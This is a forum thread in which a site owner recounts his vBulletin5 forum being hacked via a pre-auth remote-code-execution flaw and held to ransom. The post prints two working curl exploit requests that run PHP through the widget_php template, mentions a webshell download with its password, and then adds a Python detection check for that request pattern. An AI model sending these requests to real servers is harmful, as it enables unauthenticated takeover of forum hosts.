[CRITICAL] A new vBulletin5 pre-auth zero-day RCE exploit has been released.


  • [CRITICAL] A new vBulletin5 pre-auth zero-day RCE exploit has been released.

    I was solving a wargame quest (CTF), but someone hacked the "powerhacker.net" site.
    So I started responding to the hack in real time and started monitoring their techniques.
    And it was immediately apparent that the technique he used was a zero-day that was unveiled three hours ago.
    It was exactly a zero-day exploit released on August 9th, 2020.
    Is it the Black-Hat conference now?
    Looking at the date, I suspect that it was released by the Black-Hat conference.
    Attackers deleted my site's database and requested bitcoin.
    If I were you I wouldn't have stopped the site.
    So you were immediately found.


    [Description of technical words for Koreans]
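    "pre-auth" does not mean authenticating in advance; it means "without authenticating".
    Because it comes before "auth", it appears to be used in the sense of coming before authentication.
    Put simply, in Korean terms, you can take it to mean a vulnerability that works without logging in.
    I added this explanation because reading it the Korean way gives the completely opposite meaning.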


    [Reference]

    This link and PPT are a technical article from the hacker who published the zero-day.
    https://blog.exploitee.rs/
    Download: vbulletin_Exploiting_vBulletin_5.6.2_A_Tale_of_a_Patch_Fail.zip
    This vulnerability has been repeated in the past, but since it wasn't patched properly, the zero-day came back.


    I didn't have the money, so I stopped the Amazon AWS EC2 web server a week ago and migrated it to my home server.
    The hacked website was running on a docker on a server running at home.
    The server at home was broken, I checked it, and it got hacked, so the hackers asked me for bitcoins.
    I decided to abandon the restore and restart the Amazon AWS EC2 web server.
    As soon as it was turned on, the hack came in again.

    I checked the WebShell about 3-5 minutes after the attack started and immediately deleted it.
    They called themselves SilentAngel.
    (The password for the webshell is "silentangel.gov".
    Download: webshell.zip
    Are there any reasons government hackers should hack me?
    I'm a beggar right now.
    I don't even have the money to run an Amazon AWS EC2 server.)
    They seem to be proud of themselves.
    This vulnerability looks very dangerous.
    Be careful, everyone.
    It's surprising that there are hackers these days threatening online beggars and asking for bitcoins.


    Code:
    curl -s https://powerhacker.net/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();'
    curl -s https://powerhacker.net/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=passthru("ls");'

    This is the current vBulletin5 maker's forum site.
    They just closed the door.



    P.S:
    Thanks for hacking this "powerhacker.net" site.
    Thanks to you, I can write a security research article.
    Thank you for motivating me to write one more security article.
    I am lazy and cannot respond quickly to these security issues.
    Because of this site hacking, I came into contact with the security issue faster than others.

    Thanks for hacking.
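
A defensive check for the request shape shown in the curl commands above, added here as an example and not part of the original post: it flags requests under /ajax/render/ whose parameters select the widget_php template or carry a subWidgets code value, including when the brackets are percent-encoded. The function name, the host forum.example and the sample requests are constructed for illustration, and only the URL form shown in the post is covered.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Endpoint family taken from the requests shown in the post.
RENDER_PREFIX = "/ajax/render/"
# PHP-style nested keys: subWidgets[<n>][template], subWidgets[<n>][config][code]
TEMPLATE_KEY = re.compile(r"^subwidgets\[[^\]]*\]\[template\]$", re.I)
CODE_KEY = re.compile(r"^subwidgets\[[^\]]*\]\[config\]\[code\]$", re.I)


def inspect_request(method, url, body=""):
    """Return the reasons a request matches the pattern; empty list if none.

    `method` is kept for logging; parameters are checked in both the query
    string and the form body, since PHP merges them for the application.
    """
    parts = urlsplit(url)
    # Collapse duplicate slashes so //ajax//render/ is still recognised.
    path = re.sub(r"/+", "/", parts.path).lower()
    if not path.startswith(RENDER_PREFIX):
        return []
    reasons = []
    # parse_qsl percent-decodes keys and values, so %5B / %5D are handled.
    params = parse_qsl(parts.query, keep_blank_values=True)
    params += parse_qsl(body, keep_blank_values=True)
    for key, value in params:
        key = key.strip()
        if TEMPLATE_KEY.match(key) and value.strip().lower() == "widget_php":
            reasons.append("subWidgets template set to widget_php")
        elif CODE_KEY.match(key):
            reasons.append("subWidgets config carries a code parameter")
    return reasons


# Constructed sample requests (not taken from real logs).
BASE = "https://forum.example/ajax/render/widget_tabbedcontainer_tab_panel"
SAMPLES = [
    ("POST", BASE, "subWidgets[0][template]=widget_php"
                   "&subWidgets[0][config][code]=phpinfo();"),
    ("POST", BASE, "subWidgets%5B0%5D%5Btemplate%5D=widget_php"),
    ("POST", BASE, "subWidgets[0][template]=example_template"),
    ("POST", "https://forum.example/search", "q=widget_php"),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        hits = inspect_request(method, url, body)
        print("ALERT" if hits else "ok   ", method, url, hits)
```

Web server access logs normally do not record POST bodies, so this check belongs where the body is visible, such as a WAF rule, a reverse-proxy hook or application-level request logging.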

  • #2
    A security patch was released an hour ago by the vBulletin5 manufacturer.




    • #3
      Warn you! no hacked haha.



      • #4
        I always imagine dating a lovely charming female hacker who hacks into my pants like a movie.
        However, in reality, it is difficult to see a woman once a year.

        So I pledged.

        If I have to be reborn as a human in the next world after I die, I have to build up good deeds now.
        I completely got rid of my karma.
        For 14 years, I deliberately chose suffering, and all my karma was cleansed.
        Karma for this life is the report card for the next life.
        It is called the report card "Sa-Ju-Pal-Ja (Western constellation destiny)".
        I can be reborn with that report card.

        I now fully understand that this world is virtual reality.
        According to the legendary myth of the goddess Isis, this reality is hell.
        There is a scene where the goddess Isis asks her father when She comes down to hell.
        Goddess Isis said, "If I enter hell, I can never come out alone. Send a signal to my dad and he will save me.".
        The only way out of this system is "Death".
        When we call our father, we call him "Dad".
        But it is wrong.
        The correct pronunciation is "Death".

        There are many interesting stories that are useless to me.
        It's like a useless sound of a dog barking.
        But it is fun to hear it.

        Hacking a site run by a dog like me means that the person behaves like a dog.
        Hacking this site only spreads dirty germs like coronavirus all over the world.



        • #5
          This test i yet. but you show it to me on this topic.



          • #6
            thanks for this thread.....
